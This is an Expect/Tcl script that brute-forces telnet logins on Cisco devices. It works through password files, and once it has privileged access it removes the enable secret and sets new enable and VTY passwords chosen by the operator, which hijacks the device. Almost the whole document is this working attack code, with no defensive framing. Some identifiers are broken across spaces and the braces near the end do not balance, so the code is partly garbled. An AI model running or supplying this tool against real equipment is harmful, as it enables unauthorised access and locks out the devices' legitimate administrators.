##################################################### # Expect Brute Force Password # # for cisco with password authentication # # # # Written by Mr.Parinya Jutasen # # # ##################################################### #!/usr/bin/expect -f ############ Declaration ###################### set timeout 10 set server [lindex $argv 0] #set hosts [open $host_list r] #set dictionary [lindex $argv 0] set tryPass [open password.txt r] #set enable ksc #stty -echo send_user "New VTY Password:" expect_user -re "(.*)\n" send_user "\n" set password(vty) $expect_out(1,string) send_user "New Priviledge Password:" expect_user -re "(.*)\n" send_user "\n" set password(pri) $expect_out(1,string) ################## Server List ########################### #proc server_list {} { #puts "$server" #return $server #} ################## Telnet ####################### proc telnetkrub {host} { spawn telnet $host return } ########## Operation ############################ proc operation {pri vty host} { send "Hello $pri $vty\r" expect "#" { send "conf term\r"} expect "#" { send "no enable secret\r"} expect "#" { send "enable secret $pri\r"} expect "#" { send "enable password $pri\r"} expect "#" { send "line vty 0 4 \r"} expect "#" { send "password $vty\r"} expect "#" { send "exit\r"} expect "#" { send "exit\r"} expect "#" { send "exit\r";expect; spawn telnet $host;interact} return } ################ # Check Status ######################## proc expect_check_enable {g c t} { set dic [open enable.txt r] foreach passwds [split [read $dic] ] { if {$passwds=="null"} { send_user "End list Pass Goodbye\n" break } expect { "Password:" {send "$passwds\n";puts "passwds:$pass wds" } "#" {break} ">" {send "enable\r"} } } send "\r" expect "#" {puts [operation $g $c $t];exit} return } ################# Check Status ######################## proc expect_check { password p v s} { while {1} { expect { Password: { send "$password\r";puts " password_check: $password"} ">" { send "enable\r";puts [expec t_check_enable $p $v $s]} Bad {break} } } return } ############### Main ################################### #foreach server [split [read $hosts] ] { # if {$server=="null"} { # send_user "End list Goodbye\n" # exit # } foreach passwd [split [read $tryPass] ] { spawn telnet $server if {$passwd=="null"} { send_user "End list Pass Goodbye\n" break } puts [expect_check $passwd $password(pri) $password(vty) $server ] expect set id [exp_pid] exec kill -INT $id } spawn telnet $server expect_user -re "(*.)\n" } set id [exp_pid] exec kill -INT $id } #########################################################